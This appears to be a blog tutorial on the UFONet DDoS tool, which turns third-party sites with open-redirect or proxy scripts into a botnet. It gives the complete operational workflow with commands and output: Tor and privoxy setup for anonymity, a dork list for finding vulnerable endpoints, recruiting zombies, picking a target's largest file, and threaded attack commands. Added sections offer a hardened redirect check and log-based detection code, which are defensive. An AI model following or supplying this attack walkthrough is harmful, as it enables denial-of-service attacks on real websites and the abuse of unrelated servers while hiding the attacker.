UFONet is an open-source tool, licensed under GPLv3 and written by Lord Epsylon (psy) in Python, HTML5 and JavaScript, for carrying out distributed denial-of-service (DDoS) attacks by abusing open redirect flaws in third-party web applications, which are used as a botnet.
An Open Redirect vulnerability lets an attacker trigger an arbitrary redirection, essentially because the web application takes the redirect destination from a user-controlled parameter. UFONet can search Google and gather a sizeable list of web applications vulnerable to Open Redirect ("zombies") and later use them, when a target is attacked, to bounce traffic at it in bulk through those redirects. In practice the endpoints that make the attack work are those that fetch the supplied URL server-side (note that the "payload check" reply further down contains the target's HTML rather than a 3xx response); a plain HTTP redirect would only send the attacker's own client to the target.
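As an added example (not code from this post or from UFONet), here is the vulnerable pattern the paragraph describes next to a hardened version. The hardened check resolves the user-supplied target against the site's own origin first and only then compares the host against an allow-list, so the usual bypasses (`//evil.example`, backslashes, userinfo tricks such as `https://trusted@evil.example`, `javascript:` schemes) are judged by the host a browser would actually contact. The function names, the origin and the allow-list are assumptions made for the example; the same check applies to a server-side fetcher of the `proxy.php?url=` kind, where the allow-list is normally empty or limited to one's own hosts.

```python
"""Added example (not UFONet code): the unsafe open-redirect pattern beside
a hardened target check.  Names, origin and allow-list are assumptions."""
from urllib.parse import urlsplit, urljoin

# Constructed: the site's own origin, used to resolve relative targets.
SITE_ORIGIN = "https://www.example.com"
# Constructed allow-list of hosts a redirect (or a server-side fetch) may reach.
ALLOWED_HOSTS = {"www.example.com", "cdn.example.com"}


def unsafe_redirect_target(url_param):
    """Vulnerable pattern: whatever arrived in ?url= becomes the Location
    header (or the URL a proxy script fetches), with no validation at all."""
    return url_param


def safe_redirect_target(url_param, allowed_hosts=ALLOWED_HOSTS):
    """Return an absolute URL on an allowed host, or None to refuse.

    The value is resolved against SITE_ORIGIN before any check, so that
    '//evil.example', '\\\\evil.example' or 'https://www.example.com@evil.example'
    are judged by the host the browser would really contact."""
    if not url_param or any(c in url_param for c in "\r\n\x00"):
        return None  # empty, header injection or NUL byte
    # Browsers treat a backslash like a slash, so normalise before resolving.
    candidate = url_param.replace("\\", "/")
    resolved = urljoin(SITE_ORIGIN + "/", candidate)
    parts = urlsplit(resolved)
    if parts.scheme not in ("http", "https"):
        return None  # javascript:, data:, file: ...
    if parts.username or parts.password:
        return None  # userinfo confusion: https://trusted@evil
    if parts.hostname is None or parts.hostname not in allowed_hosts:
        return None  # off-site host (including trusted.com.evil.example)
    return resolved


if __name__ == "__main__":
    for probe in ("/account", "//evil.example/", "\\\\evil.example",
                  "https://www.example.com@evil.example/",
                  "javascript:alert(1)", "https://cdn.example.com/css/ie.css",
                  "http://www.example.com.evil.example/"):
        print(repr(probe), "->", unsafe_redirect_target(probe),
              "| hardened ->", safe_redirect_target(probe))
```

The same validator can be reused behind a fetching proxy; the difference is only the allow-list, and for a proxy one usually also refuses targets that resolve to private address ranges, which is outside what this example checks.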
The tool runs on Linux, Windows, OS X... on any system with Python (~2.7.x) and python-pycurl:
apt-get install python-pycurl
In this post we will run a series of tests on Kali Linux with release v0.5b - Invasion!, published less than a week ago, which additionally adds multithreading, fixes bugs and adds general and per-bot statistics.
First, clone the GitHub repository:
git clone https://github.com/epsylon/ufonet
Before starting, it is usually advisable to keep some degree of anonymity through Tor:
python ufonet --check-tor
=================================================================
[UFONet ASCII-art banner]
UFONet - DDoS attacks via Web Abuse - by psy
=================================================================
Sending request to: https://check.torproject.org
It seems that Tor is not properly set.
Your IP address appears to be: X.X.X.12
Oops! Let's fix that (privoxy listens on 127.0.0.1:8118 by default and is told here to forward everything to Tor's SOCKS port on 9050):
apt-get install vidalia privoxy
service tor start
echo "forward-socks5 / 127.0.0.1:9050 ." >> /etc/privoxy/config
service privoxy start
root@kali:~# curl --socks5 127.0.0.1:9050 curlmyip.com
89.31.X.5
root@kali:~/ufonet/ufonet# curl -x 127.0.0.1:8118 curlmyip.com
185.X.37.158
Once we have our back covered, we start looking on the Internet for web servers vulnerable to Open Redirect. We can point the tool at a file containing all our dorks:
root@kali:~/ufonet/ufonet# cat dorks.txt
proxy.php?url=
check.cgi?url=
checklink?uri=
validator?uri=
horde/util/go.php?url=
mobiquo/mobiquo.php?referer=
wp-content/themes/dt-chocolate/like_window.php?image=
wp-content/plugins/age-verification/age-verification.php?redirect_to=
gotoURL.asp?url=
root@kali:~/ufonet/ufonet# ./ufonet -v --sd=dorks.txt --proxy="http://127.0.0.1:8118"
Or specify a single one as a parameter:
root@kali:~/ufonet/ufonet# ./ufonet -v -s 'proxy.php?url=' --proxy="http://127.0.0.1:8118"
Searching for 'zombies' on google results. Good Luck ;-)
======================
Query used: https://www.google.com/xhtml?q=inurl%3A%22proxy.php%3Furl%3D%22&start=0&num=10&gws_rd=ssl
+Victim found: http://servidor/cms/sites/all/modules/ckeditor_link/proxy.php?url=
------------
+Victim found: http://servidor/blog/wp-content/plugins/google-document-embedder/proxy.php?url=
------------
+Victim found: http://servidor/cms/sites/all/modules/ckeditor_link/proxy.php?url=
------------
+Victim found: http://servidor/CPnets/proxy.php?url=
------------
+Victim found: http://servidor/cms/sites/all/modules/ckeditor_link/proxy.php?url=
------------
+Victim found: http://servidor/cms/sites/all/modules/ckeditor_link/proxy.php?url=
------------
======================
Good! It looks like we have found on Google the first candidates to become our own zombies. But we have to check whether they are really "alive" (irony++) and actually vulnerable:
Wanna check if they are valid zombies? (Y/n)
Y
Are 'they' alive? :-) (HEAD Check):
===================================
Trying: 6
---------------------
[Control] Active zombies: 6 , waiting for them to return...
[Control] Active zombies: 6 , waiting for them to return...
[Control] Active zombies: 6 , waiting for them to return...
[Control] Active zombies: 6 , waiting for them to return...
[Control] Active zombies: 6 , waiting for them to return...
[Control] Active zombies: 6 , waiting for them to return...
[Control] Active zombies: 6 , waiting for them to return...
Reply:
...
=========================================
[Control] All zombies returned to the master ;-)
---------------------
Zombie: www.victima.com
Status: Ok [200]
----------
...
==================
OK: 5 Fail: 1
==================
======================
Checking for payloads:
======================
Trying: 5
---------------------
Reply:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
Not bad at all, 5 out of 6! Now we have to "enlist" them and add them to our army of bots:
[Control] All zombies returned to the master ;-)
---------------------
Vector: http://servidor/cms/sites/all/modules/ckeditor_link/proxy.php?url=
Status: Not ready...
----------
Vector: http://servidor/CPnets/proxy.php?url=
Status: Waiting your orders...
----------
Vector: http://servidor/cms/sites/all/modules/ckeditor_link/proxy.php?url=
Status: Waiting your orders...
----------
Vector: http://servidor/cms/sites/all/modules/ckeditor_link/proxy.php?url=
Status: Not ready...
----------
Vector: http://servidor/blog/wp-content/plugins/google-document-embedder/proxy.php?url=
Status: Not ready...
----------
==================
OK: 2 Fail: 3
==================
==================
Army of 'zombies'
==================
Zombie [ 1 ]: servidor1
Zombie [ 2 ]: servidor2
------------------
Total Army: 2
------------------
Wanna update your army (Y/n)Y
-------------------------
[INFO] - Botnet updated! ;-)
Now it is time to pick a target for the DDoS attack. First we inspect the victim's URL (crawling) to find the largest object, so that the attack is more effective:
root@kali:~/ufonet/ufonet# ./ufonet -v -i http://target.com --proxy="http://127.0.0.1:8118"
...
Inspecting target's component sizes to search for better places to 'bit'... Grrr!
======================
+Style (.css) found: css/ie.css
(Size: 2607 Bytes)
------------
================================================================
================================================================
And finally, we launch the attack with the corresponding parameters:
+ with verbose output: ./ufonet -a http://target.com -r 10 -v
+ through the Tor proxy: ./ufonet -a http://target.com -r 10 --proxy="http://127.0.0.1:8118"
+ specifying the object to hit: ./ufonet -a http://target.com -r 10 -b "/css/ie.css"
+ with threads: ./ufonet -a http://target.com -r 10 --threads 50
...
Total invocations: 30 | Zombies: 3 | Hits: 30 | Fails: 0
Total time: 0:00:33.577397 | Avg time: 0:00:01.119247
Total size: 147.8KiB | Avg size: 4.9KiB
=====================
[INFO] - Attack completed! ;-)
=====================
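The attack leaves a recognisable footprint at both ends. As an added example (not part of the original post or of UFONet), the following detection logic runs over constructed combined-format log lines: on the target, the same large static object (here the stylesheet found during inspection) is requested repeatedly by several unrelated source addresses, often with a non-browser User-Agent; on a zombie host, its own redirect/proxy script is asked to fetch URLs on a host the site does not own. The thresholds, the parameter names, the host names (`target.example` stands in for the post's `http://target.com`) and every log line are assumptions made for this example.

```python
"""Added example (not UFONet code): spotting the attack in web server logs
on both the target and a zombie host.  Log lines, thresholds, parameter
names and host names are all constructed for the example."""
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined" log format.
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed: what the target sees while the zombies hit /css/ie.css.
TARGET_LOG = [
    '203.0.113.10 - - [10/Jun/2014:21:15:01 +0200] "GET /css/ie.css HTTP/1.1" 200 2607 "-" "PHP/5.3"',
    '203.0.113.10 - - [10/Jun/2014:21:15:02 +0200] "GET /css/ie.css HTTP/1.1" 200 2607 "-" "PHP/5.3"',
    '198.51.100.7 - - [10/Jun/2014:21:15:02 +0200] "GET /css/ie.css HTTP/1.1" 200 2607 "-" "curl/7.35.0"',
    '198.51.100.7 - - [10/Jun/2014:21:15:03 +0200] "GET /css/ie.css HTTP/1.1" 200 2607 "-" "curl/7.35.0"',
    '192.0.2.44 - - [10/Jun/2014:21:15:03 +0200] "GET /css/ie.css HTTP/1.1" 200 2607 "-" "-"',
    '192.0.2.44 - - [10/Jun/2014:21:15:04 +0200] "GET /css/ie.css HTTP/1.1" 200 2607 "-" "-"',
    '192.0.2.99 - - [10/Jun/2014:21:15:04 +0200] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.99 - - [10/Jun/2014:21:15:05 +0200] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

# Constructed: what a zombie (www.zombie.example) sees in its own log.
ZOMBIE_LOG = [
    '198.51.100.7 - - [10/Jun/2014:21:15:01 +0200] "GET /CPnets/proxy.php?url=http%3A%2F%2Ftarget.example%2Fcss%2Fie.css HTTP/1.1" 200 2607 "-" "curl/7.35.0"',
    '198.51.100.7 - - [10/Jun/2014:21:15:02 +0200] "GET /CPnets/proxy.php?url=http%3A%2F%2Ftarget.example%2Fcss%2Fie.css HTTP/1.1" 200 2607 "-" "curl/7.35.0"',
    '192.0.2.55 - - [10/Jun/2014:21:15:02 +0200] "GET /CPnets/proxy.php?url=%2Fdocs%2Ffile.pdf HTTP/1.1" 200 1200 "-" "Mozilla/5.0"',
    '192.0.2.56 - - [10/Jun/2014:21:15:03 +0200] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.57 - - [10/Jun/2014:21:15:03 +0200] "GET /CPnets/proxy.php?url=http%3A%2F%2Fwww.zombie.example%2Flogo.png HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

# Parameter names taken from the dork list above (assumed to be the ones to watch).
REDIRECT_PARAMS = ("url", "uri", "redirect_to", "referer", "image")


def parse(lines):
    """Parse combined-format lines into dicts; unparseable lines are skipped."""
    records = []
    for line in lines:
        m = COMBINED.match(line)
        if m:
            rec = m.groupdict()
            rec["bytes"] = 0 if rec["bytes"] == "-" else int(rec["bytes"])
            records.append(rec)
    return records


def hammered_objects(records, min_hits=5, min_sources=3):
    """Target side: paths requested >= min_hits times by >= min_sources
    distinct client IPs.  Returns {path: (hits, distinct_ips, bytes_served)}."""
    hits, ips, served = defaultdict(int), defaultdict(set), defaultdict(int)
    for r in records:
        path = r["path"].split("?", 1)[0]
        hits[path] += 1
        ips[path].add(r["ip"])
        served[path] += r["bytes"]
    return {p: (hits[p], len(ips[p]), served[p]) for p in hits
            if hits[p] >= min_hits and len(ips[p]) >= min_sources}


def offsite_fetches(records, own_hosts, params=REDIRECT_PARAMS):
    """Zombie side: requests whose redirect/proxy parameter names a host we
    do not own.  Returns [(client_ip, script_path, external_url)]; relative
    targets and our own hosts are ignored."""
    found = []
    for r in records:
        path, _, query = r["path"].partition("?")
        for name, values in parse_qs(query, keep_blank_values=True).items():
            if name not in params:
                continue
            for target in values:
                host = urlsplit(target).hostname
                if host and host not in own_hosts:
                    found.append((r["ip"], path, target))
    return found


if __name__ == "__main__":
    print("target side:", hammered_objects(parse(TARGET_LOG)))
    print("zombie side:", offsite_fetches(parse(ZOMBIE_LOG), {"www.zombie.example"}))
```

On the zombie side the client addresses in such hits are typically Tor exit nodes when the attacker follows the setup above, and the only durable fix is the target validation shown earlier; rate-limiting the script merely reduces the damage it does to others.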
Source: http://ufonet.sourceforge.net/